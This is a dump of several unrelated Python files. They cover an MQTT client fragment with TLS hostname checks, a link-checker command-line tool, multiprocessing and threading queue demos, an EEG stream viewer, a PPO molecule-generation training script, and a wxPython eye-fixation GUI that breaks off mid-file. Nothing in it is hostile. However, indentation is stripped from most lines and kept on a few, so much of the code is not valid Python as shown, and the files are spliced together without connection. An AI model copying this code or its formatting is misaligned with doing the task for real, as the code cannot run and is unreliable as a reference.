for i in range(len(self._out_messages)):
try:
if self._out_messages[i].mid == mid:
# Only inform the client the message has been sent once.
self._callback_mutex.acquire()
if self.on_publish:
self._out_message_mutex.release()
self._in_callback = True
self.on_publish(self, self._userdata, mid)
self._in_callback = False
self._out_message_mutex.acquire()
self._callback_mutex.release()
self._out_messages.pop(i)
self._inflight_messages = self._inflight_messages - 1
if self._max_inflight_messages > 0:
rc = self._update_inflight()
if rc != MQTT_ERR_SUCCESS:
self._out_message_mutex.release()
return rc
self._out_message_mutex.release()
return MQTT_ERR_SUCCESS
except IndexError:
                # An item has been removed, so the index may now be beyond the
                # end of the list. Not really an error.
                pass
self._out_message_mutex.release()
return MQTT_ERR_SUCCESS
def _handle_on_message(self, message):
self._callback_mutex.acquire()
matched = False
for t in self.on_message_filtered:
if topic_matches_sub(t[0], message.topic):
self._in_callback = True
t[1](self, self._userdata, message)
self._in_callback = False
matched = True
        if not matched and self.on_message:
self._in_callback = True
self.on_message(self, self._userdata, message)
self._in_callback = False
self._callback_mutex.release()
def _thread_main(self):
self._state_mutex.acquire()
if self._state == mqtt_cs_connect_async:
self._state_mutex.release()
self.reconnect()
else:
self._state_mutex.release()
self.loop_forever()
def _host_matches_cert(self, host, cert_host):
if cert_host[0:2] == "*.":
if cert_host.count("*") != 1:
return False
host_match = host.split(".", 1)[1]
cert_match = cert_host.split(".", 1)[1]
if host_match == cert_match:
return True
else:
return False
else:
if host == cert_host:
return True
else:
return False
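    # Examples of the matching rule above: "*.example.com" matches
    # "a.example.com" but not "a.b.example.com" or "example.com" itself;
    # a cert_host without a wildcard must equal the host exactly.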
def _tls_match_hostname(self):
try:
cert = self._ssl.getpeercert()
        except AttributeError:
            # getpeercert() can raise AttributeError ("object has no attribute
            # 'peer_certificate'"). Don't let that crash the whole client.
            # See also: http://bugs.python.org/issue13721
            raise ssl.SSLError('Not connected')
san = cert.get('subjectAltName')
if san:
have_san_dns = False
for (key, value) in san:
if key == 'DNS':
have_san_dns = True
                    if self._host_matches_cert(self._host.lower(), value.lower()):
                        return
if key == 'IP Address':
have_san_dns = True
if value.lower() == self._host.lower():
return
if have_san_dns:
# Only check subject if subjectAltName dns not found.
raise ssl.SSLError('Certificate subject does not match remote hostname.')
subject = cert.get('subject')
if subject:
for ((key, value),) in subject:
if key == 'commonName':
                    if self._host_matches_cert(self._host.lower(), value.lower()):
                        return
raise ssl.SSLError('Certificate subject does not match remote hostname.')
# Compatibility class for easy porting from mosquitto.py.
class Mosquitto(Client):
def __init__(self, client_id="", clean_session=True, userdata=None):
super(Mosquitto, self).__init__(client_id, clean_session, userdata)
|
hdj.py
|
import src.hdj_fileio as hdj_fileio  # setup.py does not include the other source files unless they are imported like this
import src.hdj_linkchecker as hdj_linkchecker
import src.hdj_util as hdj_util
import argparse
import sys
import threading
"""
Command link argument program control
"""
def main(arguments):
if arguments.url:
try:
soup = hdj_linkchecker.make_soup_object(arguments.url)
            threading.Thread(target=hdj_linkchecker.checker, args=(soup,)).start()
except Exception as e:
print("Threading exception handled in Main. Details of the Exception: ", e)
sys.exit(1)
sys.exit(0)
if arguments.surl:
req = hdj_linkchecker.single_link_check(arguments.surl)
try:
if req in range(200, 226):
print(
f"Status code for {arguments.surl} is good: {req}. Looks like it's up!"
)
elif req in range(400, 420):
print(
f"Status code for {arguments.surl} is bad: {req}. Can't find what you want!"
)
        # Simple Y/N prompt before crawling the page's links
        answer = input(
            f"Would you like to test the links at: {arguments.surl}? (Y/N) "
        )
        if answer.lower() == "y":
            soup = hdj_linkchecker.make_soup_object(arguments.surl)
            threading.Thread(target=hdj_linkchecker.checker, args=(soup,)).start()
except ConnectionError:
print(f"Having issues working with {arguments.surl}. Is it a valid URL?")
elif arguments.file:
try:
soup = hdj_fileio.file_check(arguments.file)
            threading.Thread(target=hdj_linkchecker.checker, args=(soup,)).start()
except Exception as e:
print("Threading exception handled in Main. Details of the Exception: ", e)
sys.exit(1)
sys.exit(0)
elif arguments.telescope:
try:
hdj_linkchecker.telescope()
except Exception as e:
print("Threading exception handled in Main. Details of the Exception: ", e)
sys.exit(1)
sys.exit(0)
elif arguments.ignore:
try:
soup = hdj_linkchecker.ignore(
arguments.ignore[0][0], arguments.ignore[0][1]
)
            threading.Thread(target=hdj_linkchecker.checker, args=(soup,)).start()
except Exception as e:
print("Threading exception handled in Main. Details of the Exception: ", e)
sys.exit(1)
sys.exit(0)
    elif arguments.version:
hdj_util.version()
sys.exit(0)
parser = argparse.ArgumentParser(
description="See below for optional flags.", prefix_chars="-/"
)
parser.add_argument(
"-u",
"--url",
"-url",
metavar="",
help="The url to check for broken links. Example: -u https://google.ca",
)
parser.add_argument(
"-su",
"--surl",
"-singleurl",
metavar="",
help="Checks the status of the link passed to the checker. Example: -su https://google.ca",
)
parser.add_argument(
"-f",
"--file",
"-file",
metavar="",
help="Checks through a specified html file that is "
"located in the current working directory. Example: -f index.html",
)
parser.add_argument(
"-t",
"--telescope",
"-telescope",
action="store_true",
help="Function to download the last 10 indexed posts "
"from Telescope (must be running locally)",
)
parser.add_argument(
"-i",
"--ignore",
"-ignore",
metavar="",
nargs=2,
action="append",
help="Specify a file filled with links to ignore "
"when checking a specified page.",
)
parser.add_argument(
"-v", "--version", "-version", action="store_true", help="Specifies the version"
)
args = parser.parse_args()
def main_wrapper():
main(args)
if len(sys.argv) == 1:
print("This program checks for broken links. Please specify -h for help.")
sys.exit(1)
else:
main_wrapper()
if __name__ == "__main__":
main_wrapper()
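# Example invocations (illustrative; the argument order for -i is assumed
# from the nargs=2 definition above):
#   python hdj.py -u https://google.ca                # check all links on a page
#   python hdj.py -su https://google.ca               # check a single link's status
#   python hdj.py -f index.html                       # check links in a local html file
#   python hdj.py -i ignore.txt https://google.ca     # ignore the listed links
#   python hdj.py -v                                  # print the version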
|
demo66.py
|
# -*- coding:utf-8 -*-
# @Time: 2019/11/27 9:43 AM
# @Author: Dg
import random
import time
from multiprocessing import Process, JoinableQueue
def custom(q):
    # Consumer: take items off the queue forever
    while 1:
        print("Consumer consumed {}".format(q.get()))
        time.sleep(random.random())
        q.task_done()
def produce(q):
    # Producer: put four items on the queue, then wait for them all to be
    # consumed (q.join() blocks until every item is matched by task_done())
    for x in range(4):
        time.sleep(random.random())
        q.put(x)
        print("Producer produced {}".format(x))
    q.join()
if __name__ == "__main__":
q = JoinableQueue()
c = Process(target=custom, args=(q, ))
p = Process(target=produce, args=(q, ))
c.daemon = True
c.start()
p.start()
p.join()
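# Notes on the pattern above (descriptive only):
# - q.join() inside produce() blocks until every item has been matched by a
#   q.task_done() call in the consumer, so the producer process only exits
#   once all four items are consumed.
# - The consumer is a daemon process, so it is terminated automatically when
#   the main process finishes after p.join().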
|
threads_queue.py
|
import threading
import time
from random import randint
from queue import Queue
def get_url_list(url_queue):
    # Producer: crawl the article list pages for URLs
    print("get_url_list beginning")
    while True:
        for i in range(10):
            url_queue.put("www.studyai.com/"+str(randint(1,2000))+"/")
        time.sleep(2)
        print("Producer added another 10 URLs")
def get_html_detail(id, url_queue):
    # Consumer: crawl the detail page for each article URL in the queue
    print("#"+str(id)+" get_html_detail beginning")
    while True:
        print("Remaining URL count:", url_queue.qsize())
        if not url_queue.empty():
            # for url in url_list:
            url = url_queue.get()
            print("#"+str(id)+" crawling detail page: "+url)
            time.sleep(1)
        else:
            print("URL queue is empty")
# url_queue.task_done()
# break
if __name__ == "__main__":
start_time = time.time()
url_queue = Queue(maxsize=50)
list_thread = threading.Thread(target=get_url_list,args=(url_queue,))
list_thread.start()
# list_thread.join()
detail_threads=[]
for k in range(5):
detail_thread = threading.Thread(target=get_html_detail,args=(k,url_queue))
detail_threads.append(detail_thread)
detail_thread.start()
# detail_thread.join()
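    # Note: task_done() is never called by the consumers (it is commented out
    # above), so url_queue.join() below blocks indefinitely; the producer also
    # loops forever, so this script runs until interrupted.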
url_queue.join()
consumed_time = time.time() - start_time
print("time consumed: ", consumed_time)
|
lsl-viewer.py
|
#!/usr/bin/env python
import numpy as np
import matplotlib.pyplot as plt
from scipy.signal import butter, lfilter, lfilter_zi, firwin
from time import sleep
from pylsl import StreamInlet, resolve_byprop
from optparse import OptionParser
import seaborn as sns
from threading import Thread
sns.set(style="whitegrid")
parser = OptionParser()
parser.add_option("-w", "--window",
dest="window", type='float', default=5.,
help="window lenght to display in seconds.")
parser.add_option("-s", "--scale",
dest="scale", type='float', default=100,
help="scale in uV")
parser.add_option("-r", "--refresh",
dest="refresh", type='float', default=0.2,
help="refresh rate in seconds.")
parser.add_option("-f", "--figure",
dest="figure", type='string', default="15x6",
help="window size.")
filt = True
subsample = 2
buf = 12
(options, args) = parser.parse_args()
window = options.window
scale = options.scale
figsize = np.int16(options.figure.split('x'))
print("looking for an EEG stream...")
streams = resolve_byprop('type', 'EEG', timeout=2)
if len(streams) == 0:
raise(RuntimeError("Cant find EEG stream"))
print("Start aquiring data")
class LSLViewer():
def __init__(self, stream, fig, axes, window, scale, dejitter=True):
"""Init"""
self.stream = stream
self.window = window
self.scale = scale
self.dejitter = dejitter
self.inlet = StreamInlet(stream, max_chunklen=buf)
self.filt = True
info = self.inlet.info()
description = info.desc()
self.sfreq = info.nominal_srate()
self.n_samples = int(self.sfreq * self.window)
self.n_chan = info.channel_count()
ch = description.child('channels').first_child()
        ch_names = [ch.child_value('label')]
        for i in range(self.n_chan - 1):
            ch = ch.next_sibling()
            ch_names.append(ch.child_value('label'))
self.ch_names = ch_names
fig.canvas.mpl_connect('key_press_event', self.OnKeypress)
fig.canvas.mpl_connect('button_press_event', self.onclick)
self.fig = fig
self.axes = axes
sns.despine(left=True)
self.data = np.zeros((self.n_samples, self.n_chan))
self.times = np.arange(-self.window, 0, 1./self.sfreq)
impedances = np.std(self.data, axis=0)
lines = []
for ii in range(self.n_chan):
line, = axes.plot(self.times[::subsample],
self.data[::subsample, ii] - ii, lw=1)
lines.append(line)
self.lines = lines
axes.set_ylim(-self.n_chan + 0.5, 0.5)
ticks = np.arange(0, -self.n_chan, -1)
axes.set_xlabel('Time (s)')
axes.xaxis.grid(False)
axes.set_yticks(ticks)
ticks_labels = ['%s - %.1f' % (ch_names[ii], impedances[ii])
for ii in range(self.n_chan)]
axes.set_yticklabels(ticks_labels)
self.display_every = int(0.2 / (12/self.sfreq))
# self.bf, self.af = butter(4, np.array([1, 40])/(self.sfreq/2.),
# 'bandpass')
self.bf = firwin(32, np.array([1, 40])/(self.sfreq/2.), width=0.05,
pass_zero=False)
self.af = [1.0]
zi = lfilter_zi(self.bf, self.af)
self.filt_state = np.tile(zi, (self.n_chan, 1)).transpose()
self.data_f = np.zeros((self.n_samples, self.n_chan))
def update_plot(self):
k = 0
while self.started:
samples, timestamps = self.inlet.pull_chunk(timeout=1.0,
max_samples=12)
if timestamps:
if self.dejitter:
timestamps = np.float64(np.arange(len(timestamps)))
timestamps /= self.sfreq
timestamps += self.times[-1] + 1./self.sfreq
self.times = np.concatenate([self.times, timestamps])
self.n_samples = int(self.sfreq * self.window)
self.times = self.times[-self.n_samples:]
self.data = np.vstack([self.data, samples])
self.data = self.data[-self.n_samples:]
filt_samples, self.filt_state = lfilter(
self.bf, self.af,
samples,
axis=0, zi=self.filt_state)
self.data_f = np.vstack([self.data_f, filt_samples])
self.data_f = self.data_f[-self.n_samples:]
k += 1
if k == self.display_every:
if self.filt:
plot_data = self.data_f
elif not self.filt:
plot_data = self.data - self.data.mean(axis=0)
for ii in range(self.n_chan):
self.lines[ii].set_xdata(self.times[::subsample] -
self.times[-1])
self.lines[ii].set_ydata(plot_data[::subsample, ii] /
self.scale - ii)
impedances = np.std(plot_data, axis=0)
ticks_labels = ['%s - %.2f' % (self.ch_names[ii],
impedances[ii])
for ii in range(self.n_chan)]
self.axes.set_yticklabels(ticks_labels)
self.axes.set_xlim(-self.window, 0)
self.fig.canvas.draw()
k = 0
else:
sleep(0.2)
def onclick(self, event):
print((event.button, event.x, event.y, event.xdata, event.ydata))
def OnKeypress(self, event):
if event.key == '/':
self.scale *= 1.2
elif event.key == '*':
self.scale /= 1.2
elif event.key == '+':
self.window += 1
elif event.key == '-':
if self.window > 1:
self.window -= 1
elif event.key == 'd':
            self.filt = not self.filt
def start(self):
self.started = True
self.thread = Thread(target=self.update_plot)
self.thread.daemon = True
self.thread.start()
def stop(self):
self.started = False
fig, axes = plt.subplots(1, 1, figsize=figsize, sharex=True)
lslv = LSLViewer(streams[0], fig, axes, window, scale)
help_str = """
toggle filter : d
toogle full screen : f
zoom out : /
zoom in : *
increase time scale : -
decrease time scale : +
"""
print(help_str)
lslv.start()
plt.show()
lslv.stop()
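# Example invocation (illustrative; requires a live LSL EEG stream, e.g. one
# published by muse-lsl):
#   python lsl-viewer.py -w 10 -s 150 -f 15x6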
|
ppo.py
|
import argparse
from copy import copy, deepcopy
from collections import defaultdict
from datetime import timedelta
import concurrent.futures
import gc
import gzip
import os
import os.path as osp
import pickle
import psutil
import pdb
import subprocess
import sys
import threading
import time
import traceback
import warnings
warnings.filterwarnings('ignore')
import numpy as np
import pandas as pd
from tqdm import tqdm
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch_geometric.data import Data, Batch
import torch_geometric.nn as gnn
from mol_mdp_ext import MolMDPExtended, BlockMoleculeDataExtended
from gflownet import Dataset, make_model, Proxy
import model_atom, model_block, model_fingerprint
parser = argparse.ArgumentParser()
parser.add_argument("--learning_rate", default=2.5e-4, help="Learning rate", type=float)
parser.add_argument("--mbsize", default=16, help="Minibatch size", type=int)
parser.add_argument("--opt_beta", default=0.9, type=float)
parser.add_argument("--opt_beta2", default=0.99, type=float)
parser.add_argument("--nemb", default=256, help="#hidden", type=int)
parser.add_argument("--min_blocks", default=2, type=int)
parser.add_argument("--max_blocks", default=8, type=int)
parser.add_argument("--num_iterations", default=4000, type=int)
parser.add_argument("--num_conv_steps", default=6, type=int)
parser.add_argument("--log_reg_c", default=1e-2, type=float)
parser.add_argument("--reward_exp", default=4, type=float)
parser.add_argument("--reward_norm", default=10, type=float)
parser.add_argument("--sample_prob", default=1, type=float)
parser.add_argument("--clip_grad", default=0, type=float)
parser.add_argument("--clip_loss", default=0, type=float)
parser.add_argument("--replay_mode", default='online', type=str)
parser.add_argument("--bootstrap_tau", default=0, type=float)
parser.add_argument("--weight_decay", default=0, type=float)
parser.add_argument("--array", default='array_may_18')
parser.add_argument("--repr_type", default='block_graph')
parser.add_argument("--model_version", default='v4')
parser.add_argument("--run", default=0, help="run", type=int)
parser.add_argument("--include_nblocks", default=False)
parser.add_argument("--save_path", default='results/ppo/')
parser.add_argument("--proxy_path", default='data/pretrained_proxy/')
parser.add_argument("--print_array_length", default=False, action='store_true')
parser.add_argument("--progress", default='yes')
parser.add_argument("--floatX", default='float64')
parser.add_argument("--ppo_clip", default=0.2, type=float)
parser.add_argument("--ppo_entropy_coef", default=1e-4, type=float)
parser.add_argument("--ppo_num_samples_per_step", default=256, type=float)
parser.add_argument("--ppo_num_epochs_per_step", default=32, type=float)
class PPODataset(Dataset):
def __init__(self, args, bpath, device):
super().__init__(args, bpath, device)
self.current_dataset = []
def _get_sample_model(self):
m = BlockMoleculeDataExtended()
traj = []
for t in range(self.max_blocks):
s = self.mdp.mols2batch([self.mdp.mol2repr(m)])
with torch.no_grad():
s_o, m_o = self.sampling_model(s)
v = m_o[0, 1]
logits = torch.cat([m_o[0,0].reshape(1), s_o.reshape(-1)])
cat = torch.distributions.Categorical(
logits=logits)
action = cat.sample()
lp = cat.log_prob(action)
action = action.item()
if t >= self.min_blocks and action == 0:
r = self._get_reward(m)
traj.append([m, (-1, 0), r, BlockMoleculeDataExtended(), 1, lp, v])
break
else:
action = max(0, action-1)
action = (action % self.mdp.num_blocks, action // self.mdp.num_blocks)
m_new = self.mdp.add_block_to(m, *action)
                if (len(m_new.blocks) and not len(m_new.stems)) or t == self.max_blocks - 1:
r = self._get_reward(m_new)
traj.append([m, action, r, m_new, 1, lp, v])
m = m_new
break
else:
traj.append([m, action, 0, m_new, 0, lp, v])
m = m_new
        for i in range(len(traj)):
            traj[i].append(r)  # The return is the terminal reward
            # One-step advantage: r + V(s') * (1 - done) - V(s); the final
            # transition is terminal, so its bootstrap term is zero.
            traj[i].append(traj[i][2] + (traj[i+1][6] if i < len(traj)-1 else 0) - traj[i][6])
self.sampled_mols.append((r, m))
return traj
def sample2batch(self, mb):
s, a, r, sp, d, lp, v, G, A = mb
s = self.mdp.mols2batch([self.mdp.mol2repr(i) for i in s])
a = torch.tensor(a, device=self._device).long()
r = torch.tensor(r, device=self._device).to(self.floatX)
d = torch.tensor(d, device=self._device).to(self.floatX)
lp = torch.tensor(lp, device=self._device).to(self.floatX)
G = torch.tensor(G, device=self._device).to(self.floatX)
A = torch.tensor(A, device=self._device).to(self.floatX)
return s, a, r, d, lp, v, G, A
def r2r(self, dockscore=None, normscore=None):
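        # Map a raw docking score to a reward: normalize against target_norm,
        # clip at R_min, rescale by reward_norm, then exponentiate by reward_exp.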
if dockscore is not None:
normscore = 4-(min(0, dockscore)-self.target_norm[0])/self.target_norm[1]
normscore = max(self.R_min, normscore)
return (normscore/self.reward_norm) ** self.reward_exp
def start_samplers(self, n, mbsize):
self.ready_events = [threading.Event() for i in range(n)]
self.resume_events = [threading.Event() for i in range(n)]
self.results = [None] * n
def f(idx):
while not self.stop_event.is_set():
try:
self.results[idx] = self.sample2batch(self.sample(mbsize))
except Exception as e:
print("Exception while sampling:")
print(e)
self.sampler_threads[idx].failed = True
self.sampler_threads[idx].exception = e
self.ready_events[idx].set()
break
self.ready_events[idx].set()
self.resume_events[idx].clear()
self.resume_events[idx].wait()
self.sampler_threads = [threading.Thread(target=f, args=(i,)) for i in range(n)]
[setattr(i, 'failed', False) for i in self.sampler_threads]
[i.start() for i in self.sampler_threads]
round_robin_idx = [0]
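        # Poll the sampler threads round-robin: hand back the first ready
        # minibatch, then let that thread resume sampling the next one.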
def get():
while True:
idx = round_robin_idx[0]
round_robin_idx[0] = (round_robin_idx[0] + 1) % n
if self.ready_events[idx].is_set():
r = self.results[idx]
self.ready_events[idx].clear()
self.resume_events[idx].set()
return r
elif round_robin_idx[0] == 0:
time.sleep(0.001)
return get
def stop_samplers_and_join(self):
self.stop_event.set()
if hasattr(self, 'sampler_threads'):
while any([i.is_alive() for i in self.sampler_threads]):
[i.set() for i in self.resume_events]
[i.join(0.05) for i in self.sampler_threads]
_stop = [None]
def train_model_with_proxy(args, model, proxy, dataset, num_steps=None, do_save=True):
debug_no_threads = False
device = torch.device('cuda')
if num_steps is None:
num_steps = args.num_iterations + 1
tau = args.bootstrap_tau
if args.bootstrap_tau > 0:
target_model = deepcopy(model)
if do_save:
exp_dir = f'{args.save_path}/{args.array}_{args.run}/'
os.makedirs(exp_dir, exist_ok=True)
dataset.set_sampling_model(model, proxy, sample_prob=args.sample_prob)
def save_stuff():
pickle.dump([i.data.cpu().numpy() for i in model.parameters()],
gzip.open(f'{exp_dir}/params.pkl.gz', 'wb'))
pickle.dump(dataset.sampled_mols,
gzip.open(f'{exp_dir}/sampled_mols.pkl.gz', 'wb'))
pickle.dump({'train_losses': train_losses,
'test_losses': test_losses,
'test_infos': test_infos,
'time_start': time_start,
'time_now': time.time(),
'args': args,},
gzip.open(f'{exp_dir}/info.pkl.gz', 'wb'))
pickle.dump(train_infos,
gzip.open(f'{exp_dir}/train_info.pkl.gz', 'wb'))
opt = torch.optim.Adam(model.parameters(), args.learning_rate, weight_decay=args.weight_decay,
betas=(args.opt_beta, args.opt_beta2))
#opt = torch.optim.SGD(model.parameters(), args.learning_rate)
#tf = lambda x: torch.tensor(x, device=device).float()
tf = lambda x: torch.tensor(x, device=device).to(args.floatX)
tint = lambda x: torch.tensor(x, device=device).long()
mbsize = args.mbsize
ar = torch.arange(mbsize)
last_losses = []
def stop_everything():
print('joining')
dataset.stop_samplers_and_join()
_stop[0] = stop_everything
train_losses = []
test_losses = []
test_infos = []
train_infos = []
time_start = time.time()
time_last_check = time.time()
loginf = 1000 # to prevent nans
log_reg_c = args.log_reg_c
clip_loss = tf([args.clip_loss])
clip_param = args.ppo_clip
entropy_coef = args.ppo_entropy_coef
for i in range(num_steps):
samples = []
with concurrent.futures.ThreadPoolExecutor(max_workers=8) as executor:
futures = [executor.submit(dataset._get_sample_model)
for i in range(args.ppo_num_samples_per_step)]
            for future in tqdm(concurrent.futures.as_completed(futures), total=len(futures), leave=False):
samples += future.result()
for j in range(args.ppo_num_epochs_per_step):
idxs = dataset.train_rng.randint(0, len(samples), args.mbsize)
mb = [samples[i] for i in idxs]
s, a, r, d, lp, v, G, A = dataset.sample2batch(zip(*mb))
s_o, m_o = model(s)
new_logprob = -model.action_negloglikelihood(s, a, 0, s_o, m_o)
values = m_o[:, 1]
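            # PPO clipped surrogate: take the importance ratio between the new
            # and old (rollout-time) policies and clip it to [1-eps, 1+eps] so
            # a single update cannot move the policy too far.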
ratio = torch.exp(new_logprob - lp)
surr1 = ratio * A
surr2 = torch.clamp(ratio, 1.0 - clip_param,
1.0 + clip_param) * A
action_loss = -torch.min(surr1, surr2).mean()
value_loss = 0.5 * (G - values).pow(2).mean()
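            # Entropy bonus over the hierarchical action space: sum the
            # per-stem block entropies into their molecule via index_add_,
            # then add the molecule-level stop-action entropy.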
m_p, s_p = model.out_to_policy(s, s_o, m_o)
p = torch.zeros_like(m_p).index_add_(0, s.stems_batch, (s_p * torch.log(s_p)).sum(1))
p = p + m_p * torch.log(m_p)
entropy = -p.mean()
loss = action_loss + value_loss - entropy * entropy_coef
opt.zero_grad()
loss.backward()
if args.clip_grad > 0:
torch.nn.utils.clip_grad_value_(model.parameters(),
args.clip_grad)
opt.step()
last_losses.append((loss.item(), value_loss.item(), entropy.item()))
train_losses.append((loss.item(), value_loss.item(), entropy.item()))
if not i % 10:
last_losses = [np.round(np.mean(i), 3) for i in zip(*last_losses)]
print(i, last_losses, G.mean().item())
print('time:', time.time() - time_last_check)
time_last_check = time.time()
last_losses = []
if not i % 25 and do_save:
save_stuff()
stop_everything()
if do_save:
save_stuff()
return model
def main(args):
bpath = "data/blocks_PDB_105.json"
device = torch.device('cuda')
if args.floatX == 'float32':
args.floatX = torch.float
else:
args.floatX = torch.double
dataset = PPODataset(args, bpath, device)
print(args)
mdp = dataset.mdp
model = make_model(args, mdp, out_per_mol=2)
    model.to(args.floatX)
model.to(device)
proxy = Proxy(args, bpath, device)
train_model_with_proxy(args, model, proxy, dataset, do_save=True)
print('Done.')
def array_may_18(args):
base = {'nemb': 256,
}
all_hps = [
{**base,},
]
return all_hps
if __name__ == '__main__':
args = parser.parse_args()
if args.array:
all_hps = eval(args.array)(args)
if args.print_array_length:
print(len(all_hps))
else:
hps = all_hps[args.run]
print(hps)
for k,v in hps.items():
setattr(args, k, v)
main(args)
else:
try:
main(args)
except KeyboardInterrupt as e:
print("stopping for", e)
_stop[0]()
raise e
except Exception as e:
print("exception", e)
_stop[0]()
raise e
|
wxFixGUI.py
|
import asyncore
import os
import wx
import math
import wx.lib.agw.floatspin as FS
from time import sleep
from ViewPane import ViewPane
from protocolPane import ProtocolPane
from controlPanel import ControlPanel
from LightCrafter import wxLightCrafterFrame
from PreferencesDialog import PreferencesDialog
import socket
import threading
myEVT_MESSAGE = wx.NewEventType()
EVT_MESSAGE = wx.PyEventBinder(myEVT_MESSAGE, 1)
myEVT_RETURN_MESSAGE = wx.NewEventType()
EVT_RETURN_MESSAGE = wx.PyEventBinder(myEVT_RETURN_MESSAGE, 2)
# Sets Up The Class For The Program And Creates The Window
class wxFixationFrame(wx.Frame):
    # The number of pixels per degree (ppd) of the screen we'll be projecting to (e.g. Lightcrafter, Projector, etc).
SCREEN_PPD = 20
# The increment steps we'll use.
MINOR_INCREMENT = 0.5
MAJOR_INCREMENT = 1
def __init__(self, parent=None, id=wx.ID_ANY):
wx.Frame.__init__(self, parent, id, 'Automated Fixation Graphical User Interface')
self.withSerial = False
# Initial Conditions
self.horz_loc = 0.0
self.vert_loc = 0.0
self.diopter_value = 0.0
self._eyesign = -1
self._locationfname = None
self._locationpath = None
self._locfileobj = None
self.ArduinoSerial = None
self.header_dir = ""
self.filename = ""
self.SaveLoc = True
# Allows Exit Button to Close Serial Communication
self.Bind(wx.EVT_CLOSE, self.on_quit)
# Allows For Arrow Keys And Keys In General
self.Bind(wx.EVT_CHAR_HOOK, self.on_keyboard_press)
self.initProtocolPanel(self)
self.initControlPanel(self)
self.initViewPane(self)
# Handles mouse motion, presses, and wheel motions
self.viewpane.Bind(wx.EVT_MOTION, self.on_mouse_motion)
self.viewpane.Bind(wx.EVT_LEFT_DOWN, self.on_left_mouse_button)
self.viewpane.Bind(wx.EVT_RIGHT_DOWN, self.on_right_mouse_button)
self.viewpane.Bind(wx.EVT_RIGHT_UP, self.on_right_mouse_button)
self.Bind(wx.EVT_MOUSEWHEEL, self.on_mouse_wheel)
# Bind to any changes in the rotation slider
self.control._iminitpane.BindTo(self.on_rotation_slider)
horzsizer = wx.BoxSizer(wx.HORIZONTAL)
horzsizer.Add(self.protocolpane, proportion=0, flag=wx.EXPAND)
horzsizer.Add(self.imagespace, proportion=0, flag=wx.EXPAND)
horzsizer.Add(self.control, proportion=0, flag=wx.EXPAND)
self.init_menubar()
# Displays Main Panel
self.SetSizerAndFit(horzsizer)
self.Layout()
self.Centre()
# Spawn the LightCrafter Canvas.
self.LCCanvas = wxLightCrafterFrame()
self.LCCanvas.Show()
self.prev_cursor = self.LCCanvas.get_fixation_cursor()
self.Bind(EVT_MESSAGE, self.handle_message)
# Spawn the pair of listener threads so we can detect changes in the comm Queues passed by Savior
        self.fovListener = ConnListener(self)  # This will receive a tuple of sizes
        self.fovListenerThread = threading.Thread(target=asyncore.loop, kwargs={'timeout': 1})
        self.fovListenerThread.daemon = True
self.fovListenerThread.start()
def initViewPane(self, parent):
# Setting up the ViewPane
self.imagespace = wx.Panel(parent, wx.ID_ANY)
self.imagespace.SetBackgroundColour('black')
self.viewpane = ViewPane(self.imagespace, size=(513, 513))
# Create left label
ltext = wx.Font(13, wx.FONTFAMILY_SWISS, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_BOLD, False)
left_text = '\n\nN\na\ns\na\nl'
self.l_text = wx.StaticText(self.imagespace, wx.ID_ANY, left_text, style=wx.ALIGN_CENTER)
self.l_text.SetForegroundColour('white')
self.l_text.SetFont(ltext)
# Create top label
stext = wx.Font(13, wx.FONTFAMILY_SWISS, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_BOLD, False)
superior = wx.StaticText(self.imagespace, wx.ID_ANY, 'Superior', style=wx.ALIGN_CENTER)
superior.SetForegroundColour('white')
superior.SetFont(stext)
# Create bottom label
stext = wx.Font(13, wx.FONTFAMILY_SWISS, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_BOLD, False)
inferior = wx.StaticText(self.imagespace, wx.ID_ANY, 'Inferior', style=wx.ALIGN_CENTER)
inferior.SetForegroundColour('white')
inferior.SetFont(stext)
# Create right label
rtext = wx.Font(13, wx.FONTFAMILY_SWISS, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_BOLD, False)
right_text = 'T\ne\nm\np\no\nr\na\nl'
self.r_text = wx.StaticText(self.imagespace, wx.ID_ANY, right_text, style=wx.ALIGN_CENTER)
self.r_text.SetForegroundColour('white')
self.r_text.SetFont(rtext)
horzsizer = wx.BoxSizer(wx.HORIZONTAL)
vertsizer = wx.BoxSizer(wx.VERTICAL)
# Insert left label
horzsizer.Add(self.l_text, proportion=0, flag=wx.CENTER)
# The "center panel" is now a vertcontrol sizer- insert top, viewpane, and bottom pieces
vertsizer.Add(superior, proportion=0, flag=wx.CENTER)
vertsizer.Add(self.viewpane, 0, wx.ALIGN_CENTER | wx.ALL)
vertsizer.Add(inferior, proportion=0, flag=wx.CENTER)
        # Insert the vertical sizer
horzsizer.Add(vertsizer, 0, wx.ALIGN_CENTER | wx.ALL)
# Insert right label
horzsizer.Add(self.r_text, proportion=0, flag=wx.CENTER)
self.imagespace.SetSizer(horzsizer)
def initProtocolPanel(self, parent):
self.protocolpane = ProtocolPane(parent, id=wx.ID_ANY)
def initControlPanel(self, parent):
self.control = ControlPanel(parent, id=wx.ID_ANY)
# Bind all the events to the control panel
self.control.vertcontrol.Bind(FS.EVT_FLOATSPIN, self.on_vert_spin)
self.control.horzcontrol.Bind(FS.EVT_FLOATSPIN, self.on_horz_spin)
self.control.minorStep.Bind(FS.EVT_FLOATSPIN, self.on_minor_step)
self.control.majorStep.Bind(FS.EVT_FLOATSPIN, self.on_major_step)
self.control.OS.Bind(wx.EVT_RADIOBUTTON, self.on_eye_select)
self.control.OD.Bind(wx.EVT_RADIOBUTTON, self.on_eye_select)
self.control._iminitpane.selectim.Bind(wx.EVT_BUTTON, self.on_button_press)
self.control._iminitpane.initalign.Bind(wx.EVT_BUTTON, self.on_button_press)
# Menu Bar
def init_menubar(self):
# System Alignment Options
self.id_rec_ser = 10001
self.id_save_on = 10002
self.id_save_off = 10003
self.id_on_fill = 10011
self.id_off_fill = 10012
self.id_on_align = 10021
self.id_off_align = 10022
self.id_on_grid = 10031
self.id_off_grid = 10032
self.id_on_toggle = 10041
self.id_off_toggle = 10042
self.id_save_proto_loc = 10004
self.id_open_proto = 10005
self.id_clear_proto = 10006
# Creates Menu Bar
menubar = wx.MenuBar()
fileMenu = wx.Menu()
protoMenu = wx.Menu()
targetMenu = wx.Menu()
menubar.Append(fileMenu, 'File')
menubar.Append(protoMenu, 'Protocol')
menubar.Append(targetMenu, 'Target')
# Open a protocol
protoMenu.Append(self.id_save_proto_loc, 'Set Protocol Save Location...\t')
self.Bind(wx.EVT_MENU, self.on_set_save_protocol_location, id=self.id_save_proto_loc)
protoMenu.Append(self.id_open_proto, 'Open Protocol...\t')
